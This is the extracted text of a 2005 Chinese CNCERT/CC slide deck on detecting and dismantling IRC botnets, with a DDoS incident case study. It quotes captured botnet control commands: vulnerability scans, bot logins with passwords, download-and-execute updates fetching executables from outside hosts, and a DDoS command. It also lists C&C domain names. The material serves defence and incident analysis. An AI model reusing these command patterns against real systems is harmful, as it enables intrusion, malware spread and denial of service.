互联网网络安全应急工作回顾与展望

1、CNCERT/CC关于僵尸网络的应对措施国家计算机网络应急技术处理协调中心陈明奇 博士2005年11月17日 天津摘要第一部分 背景第二部分 发现和处置第三部分 CNCERT/CC的工作监测情况和活动规律应对措施第四部分 实际案例分析一 背景网络安全的传统三大威胁： 病毒/木马/蠕虫（Virus/Trojan/Worm）拒绝服务攻击（DoS/DDoS）垃圾邮件 （Spam）黑客动机的改变：以经济利益为驱动，不再追求轰动性效果带来的名声和炫耀技巧 组织的改变：由单打独斗转向有组织的活动主要的新威胁：网络仿冒钓鱼陷井，防不胜防间谍软件明修栈道，暗渡陈仓垃圾信息指哪发哪，带宽垃圾僵尸网络黑色军团，一

2、呼百应如何应对这些新威胁？网络仿冒APWG 间谍软件VENDER(MS, AV company)垃圾信息尚未引起重视，将无所盾形僵尸网络越来越严重，越来越多的人在谈论2004年，美国最大的家庭宽带ISP Comcast被发现成为互联网上最大的垃圾邮件来源，Comcast的用户平均每天发送的8亿封邮件中，有88是使用存在于Comcast内的BotNet发送的垃圾邮件。，趋势科技 TrendLabs在“2004年9月病毒感染分析报告”中指出，个人计算机成为任人摆布的僵尸计算机的机率，相较于去年9月成长23.5倍。2004年10月网络安全机构 SANS表示，僵尸计算机已被黑客当作用来勒索的工具，若要

3、避免服务器因 DoS 而瘫痪的代价是付给黑客4万美金。2004年11月，根据反网钓工作小组（APWG）的安全专家观察,网络钓鱼（Phishing）的技术愈来愈高明，现在骗徒可运用受控僵尸系统（BotNet）来扩大网钓范围，坐等受害者上钩。2004年出现的Korgo系列、GaoBot系列、SdBot系列蠕虫组成的BotNet可接受控制者指令，实施许多网络攻击行动。3月爆发的Witty蠕虫，Caida怀疑该蠕虫利用BotNet散发，因为其初始感染计算机数目超过100台。Botnet网络安全界的新挑战目前仍未得到有效遏制：2004年7月英国路透社的报导，有一个由青少年人组成的新兴行业正盛行：出租可由

4、远程恶意程序任意摆布的计算机，这些受控制的计算机称之为”僵尸（Zombie）”计算机。数目小自10部大到3万部，只要买主愿意付钱，它们可以利用这些僵尸网络(BotNet)，进行垃圾邮件散播、网络诈欺(phishing)、散播病毒甚至拒绝服务攻击，代价仅需每小时100美元。问题：如何发现僵尸网络？到底僵尸网络在干什么？如何捣毁僵尸网络？ 3.6 cents per bot week6 cents per bot weekSeptember 2004 postings to SpecialH, S20-30k always online SOCKs4, url is de-duped and up

5、dated every 10 minutes. 900/weekly, Samples will be sent on request. Monthly payments arranged at discount prices.$350.00/weekly - $1,000/monthly (USD) Type of service: Exclusive (One slot only)Always Online: 5,000 - 6,000Updated every: 10 minutesIRC僵尸网络的发现一、蜜罐（Honeypot)例子：“honeynet project”项目二、IDS+

6、IRC协议解析：例子：863917网络安全监测平台 三、BOT行为特征：快速加入型bot 长期连接型 bot发呆型bot 例子：DdoSVax项目二、僵尸网络的发现和处置 IRC僵尸网络发现方法比较作用范围及发现的bot类型收集信息的类型收集信息的粒度HoneyPot监测点上 有感染传播能力的botbot收到/发出的所有消息很细 ，但只限于bot收发的信息IRC协议特征监测范围内 活动的bot符合已知的（IRC）协议监测条件的网络通信内容掌握整体信息和一些特定命令信息；如：可以发现控制者和控制服务器之间的信息，但缺乏报文内容信息Bot行为特征监测范围内 发现较大规模的且严格使用IRC协议的bo

7、tnet不适合收集具体信息掌握整体信息；不适合收集具体信息知己知彼：控制服务器信息：域名或IP、端口（port）、连接密码 (如果有)；频道信息: 频道名（channel）、频道密码(如有)；控制密码、编码规则和Host控制者发送密码到频道中，用于标识身份，常以.login pass的形式出现。编码规则和是否启用host认证是bot程序实现的，不体现在网络通信中。Bot支持的命令集主要功能，包括认证、升级和自删除类的命令，比如！login、.update、.download、.uninstall等。 僵尸网络的处置一、擒贼先擒王模拟控制者，对僵尸网络进行完全控制 最终解决办法：直接找到控制服务

8、器，需要授权或用户配合：方法1：发送更新命令(吃毒丸) ；方法2：发送自删除命令 (集体自杀)；条件： 掌握控制者身份认证信息二、釜底抽薪切断用户主机和控制服务器的联系 ：方法1：网络边界上阻断C&C通信 条件：掌握控制服务器的准确信息 方法2：取消域名，无法解析;条件：得到授权 三、攘外必先安内清除用户终端上的Bot程序，打补丁：手工查杀专杀工具或升级杀毒程序问题：如何发现BOT? 僵尸网络的处置三、CNCERT/CC的工作我们发现了什么？每两天一次报告Top 5，6月3日至9月19日，发现较大规模僵尸网络59个，平均每天发现3万个僵尸网络客户端这些僵尸网络不断扫描扩张、更新版本、下载间谍软

9、件和木马、发动各种形式的拒绝服务攻击。例如：hotgirls网络，客户端数量最多时达到29624个。频道主题都是：ipscan s.s.s.s dcom2 86400 256 8000 s（利用dcom漏洞传播，客户端bot保持沉默）* wormride -s -t * download /df.exe c:windowsdefrag32.exe -e s(下载df.exe保存为defrag32并悄悄执行)僵尸网络情况统计(2005年6月3日-6月 23日)IRC C&C Server 分布: 34个 美国:18; 韩国:5; 中国:4; 瑞典:2; 意大利:2; 日本：1;挪威: 1; 香港

10、 :1.发现一个客户端规模超过15万的僵尸网络(2005年8月19日9月19日)发现一昵称为gunit的用户曾经登陆该网络并向多个频道发送控制命令，命令为扫描某种漏洞。如下。红色部分和样本的活动吻合。8月29日 12点PRIVMSG #asnftp :.login booties -s;cmd=:gunit!DIEdark.acid.xPRIVMSG #nesebot :.login nesebot -s;cmd=:gunit!DIEnesePRIVMSG #urxbot :.login prx -s;cmd=:gunit!DIE;TOPIC #.ForBotX.# :.adv.start l

11、sass 120 5 9999 -b -r -s;cmd=:gunit;TOPIC #.asnftp :.advscan asn1smb 100 3 0 -r -s;cmd=:gunit;TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s;cmd=:gunitTOPIC #forasn :.adv.start asn 120 5 0 -r;cmd=:gunit;TOPIC #phat# :.scan.startall;cmd=:gunit; TOPIC #urxbot :.advscan dcom135 500 3 0 -r;cmd=

12、:gunit;发现了控制黑客的线索(2005年8月29日)僵尸网络的生命周期 (Life Cycle)一、僵尸网络的产生（botnet creation)其他传播手段：垃圾邮件、社会工程学蠕虫创建僵尸网络：Deloder/Mytob/Zotob僵尸网络创建新的僵尸网络：2005.9.18 9:00332 botz-96018 #ass :!upd4t3z http:/peckno.site.voila.fr/win2k.exe the botz-96018连接到 67.43.*.*:6667 并加入 JOIN #suce fuck.然后，接收新命令：: 332 Suce-548836 #suc

13、e :-ntscan 254 1000 -a b于是，一个新的僵尸网络就在开始形成僵尸网络的生命周期 (Life Cycle)二、僵尸网络的扩散（botnet spread）TOPIC #asn-new# :.advscan asn1smb 400 3 0 -r -b sTOPIC #bitch :+advscan Asn1smbnt 199 5 0 201.x.x.x -r sTOPIC #xdcc4 :sadvscan asn1smb 150 5 0 201.5.x.xTOPIC #XOwneD :!ntscan 350 1000 -a -b;TOPIC #111 :.advscan ls

14、ass_445 100 5 120 -r332 nffe #fanta :.scan pnp 50 6000 221332 #bot :$advscan WksSvcOth 400 5 0 221.x.x.x -b -r;332 #tvr0 x :advscan dcom135 300 5 0 -r s332 #Rxx :.asc -S -s!.ntscan 40 5 0 -b -r -e -h!.asc PnP 40 10 0 -b -r -e -h!332 .#r00 x %advscan dcom135 300 5 0 -r -b s332 .#asn :.scanall s332 .#

15、.wadside :adv.start lsass 150 6 9999 -b -r s332 .#.pwnt. :.xscan msass 300 5 0 -b -s;332 .#.#smash3r#.# :.root.start msass 200 0 5 -a -r s332 .#scarezsql# :-scan.startall!-bot.secure -s!-scan.addnetrange x.x.x.x/16 100僵尸网络的生命周期 (Life Cycle)三、僵尸网络的迁移（botnet transfer）1. IRC Server变换物理主机(待发现实例)2. IRC S

16、erver逻辑变换：动态域名，指向同一主机;克隆，创建一个新的线程连接到新的服务器和频道3. IRC Server内部迁移有的Bot会从一个频道迁移到另一频道。为达到这个目的，仅仅需要修改原始频道的主题即可。2005年9月27日发现的实例如下。时间BotDirservermessage9.27 19202.100.*.*(CN)64.18.*.* (UA): 332 #FEnRRuff :$J01n #1,#29.27 19202.100.*.*564.18. *.*JOIN para=#1,#2 (null)9.27 20202.100. *.*64.18. *.*: TOPIC #1 :$

17、advscan Asn1smbnt 150 5 0 -b -r -s9.27 20202.100. *.*64.18. *.*: TOPIC #2 :$advscan Asn1smbnt 150 5 0 -b -r -s9.27 21202.103.*.* (CN)64.18. *.*(UA)JOIN #FEnRRuff bot加入 #FEnRRuff频道后，被命令加入频道 #1 and #2 , 就会接收到命令 $advscan9.27 20202.103. *.*64.18. *.*: 332 #1 :$advscan Asn1smbnt 150 5 0 82.x.x.x -a -r -s

18、僵尸网络的生命周期 (Life Cycle)四、僵尸网络的升级（botnet update）Bot文件升级：通过TOPIC或 PRIVMSG 2005.9.18 8.am:Nos!W0otTOPIC #hb3 :.hell.download /cannon/php1/images/duh.exe explore.exe -e;cmd=;TOPIC #rooted :sdownload http:/site.voila.fr/qhzteam/asn.exePRIVMSG #em :!upadfkadf /stolen2.exe stolenBot 模块升级：增加或减少相应模块2005年09月19

19、日 02点NotaBot:PRIVMSG #NotaBot :.spread.remove.module mssqlrnPRIVMSG #NotaBot :.spread.remove.module dcom1rnPRIVMSG #NotaBot :.spread.add.module vnc_scanrnPRIVMSG #NotaBot :.spread.add.module radmin_emptyrn僵尸网络的生命周期 (Life Cycle)五、僵尸网络的活动（Botnet Activity） 发动拒绝服务攻击、下载spyware、窃取信息、扫描扩散等等。22005年09月19日 12

20、点PRIVMSG #NotaBotslog : VNC Found :218.14. *.*:111111 /发现新的VNC简单密码PRIVMSG #NotaBot: Active Modules : ms04011 ipc wins netdde veritas vnc_scan radmin_empty/所具备的扫描漏洞的模块0927日 20 TOPIC #bla :.ddos.random 81.169. *.* 80 120/发动拒绝服务攻击僵尸网络的生命周期 (Life Cycle)六、僵尸网络的消亡（Botnet decease）1、C&C servers不可连接人为因素或其他因素

21、(网络配置)：DDNS /DNS无法解析2、C&C server配置错误，bot无法加入3、 用户清除了bot4、升级防病毒产品5、控制者或安全专家发出删除指令( .remove/.uninstall)6、bot间彼此争夺客户端控制权CNCERT/CC如何应对？1 自2004年12月起，利用863-917网络安全监测平台，监测IRC BotNet。2 加强对IRC BotNet实际危害的监测和发现：2005年7月份建设Honeypot。3 加强对涉及BotNet事件的处理力度，利用积累的数据研究其活动规律，如“僵尸网络生命周期”4 在网站上加强对BotNet危害的宣传力度,为公众提供有关流行B

22、ot的信息和解决方案。5 搜集互联网上流行的Bot类恶意代码样本,联合其他应急组织、安全厂商，加大研究分析力度，发布安全工具。6 积极配合有关部门,打击制作传播利用Bot的犯罪分子。四、案例介绍：DDOS僵尸网络事件处理过程（一）：发现1）接到用户报警：大量的持续的拒绝服务攻击，带宽被严重占用。网络讹诈？2）按照DDOS的处理流程，找到一台攻击主机，发现木马程序。BotNet？事件处理过程（二）(二) 代码分析：BKDR_VB.CQ木马扫描功能；上传下载文件功能；服务端版本升级；获得服务端操作系统版本及语言，处理器型号信息，url信息；HTTP；SMTP； 事件处理过程（二）(二) 代码分析I

23、RC控制服务器使用动态域名 anthony.ipv6.usr. peter.freehost. carlyle.dns2go. khond.vip.vhost. lamen.vhost. massuse.ipv6.free. bruce.free. john.usr. 事件处理过程（二）动态域名解析后得到IP地址及相应源端口 216.152.*.*6667 美国 212.204.*.* 6667 荷兰 64.12.*.* 6667 美国 207.68.*.* 6667 美国 61.197.*. * 8000 日本 218.157. *. * 443 韩国 221.146. *. * 554 韩

24、国 219.153. *. * 8000 重庆市攻击源（202.108.*.*）会接收来自这八个IP地址发出的攻击指令进行攻击。事件处理过程（三）(三)重庆控制节点采集数据 在主机所有者的配合下，对BotNet和黑客的动作进行跟踪。截止到12曰10日受到该肇事者控制的攻击机大约有60000多台；受到重庆控制机控制的攻击机有8000多台，当时处于活动状态的有3712台。定位黑客：IP地址为60.2.*.*，河北某ADSL用户事件处理过程(四)(四) 网络监测抽样监测及监测数据分析 1、共计发现171641个IP地址被植入BKDR_VB.CQ木马，其中大陆境内156120台。事件处理过程(四)2、境外，共计15521台(2004年12月13日至2005年1月10日)向政府部门报告信息产业部国家信息化工作小组办公室安全组公安部CNCERT/CC配合公安机关迅速行动事件处理过程(